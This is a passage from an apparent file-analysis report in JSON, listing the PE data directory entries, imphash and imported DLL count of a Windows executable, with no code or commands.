1325. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
1326. "size": "0x00000000"
1327. },
1328. {
1329. "virtual_address": "0x0005abdc",
1330. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
1331. "size": "0x00000064"
1332. },
1333. {
1334. "virtual_address": "0x00000000",
1335. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
1336. "size": "0x00000000"
1337. },
1338. {
1339. "virtual_address": "0x00000000",
1340. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
1341. "size": "0x00000000"
1342. },
1343. {
1344. "virtual_address": "0x00000000",
1345. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
1346. "size": "0x00000000"
1347. },
1348. {
1349. "virtual_address": "0x00060000",
1350. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
1351. "size": "0x00000eec"
1352. },
1353. {
1354. "virtual_address": "0x00000000",
1355. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
1356. "size": "0x00000000"
1357. },
1358. {
1359. "virtual_address": "0x00000000",
1360. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
1361. "size": "0x00000000"
1362. },
1363. {
1364. "virtual_address": "0x00000000",
1365. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
1366. "size": "0x00000000"
1367. },
1368. {
1369. "virtual_address": "0x00000000",
1370. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
1371. "size": "0x00000000"
1372. },
1373. {
1374. "virtual_address": "0x00000000",
1375. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
1376. "size": "0x00000000"
1377. },
1378. {
1379. "virtual_address": "0x00000000",
1380. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
1381. "size": "0x00000000"
1382. },
1383. {
1384. "virtual_address": "0x00001000",
1385. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
1386. "size": "0x000001a0"
1387. },
1388. {
1389. "virtual_address": "0x00000000",
1390. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
1391. "size": "0x00000000"
1392. },
1393. {
1394. "virtual_address": "0x00000000",
1395. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
1396. "size": "0x00000000"
1397. },
1398. {
1399. "virtual_address": "0x00000000",
1400. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
1401. "size": "0x00000000"
1402. }
1403. ],
1404. "exports": [],
1405. "guest_signers": {},
1406. "imphash": "7073758031d4012622cea53183697aac",
1407. "icon_fuzzy": null,
1408. "icon": null,
1409. "pdbpath": null,
1410. "imported_dll_count": 4,
1411. "versioninfo": []
1412. }
1413. }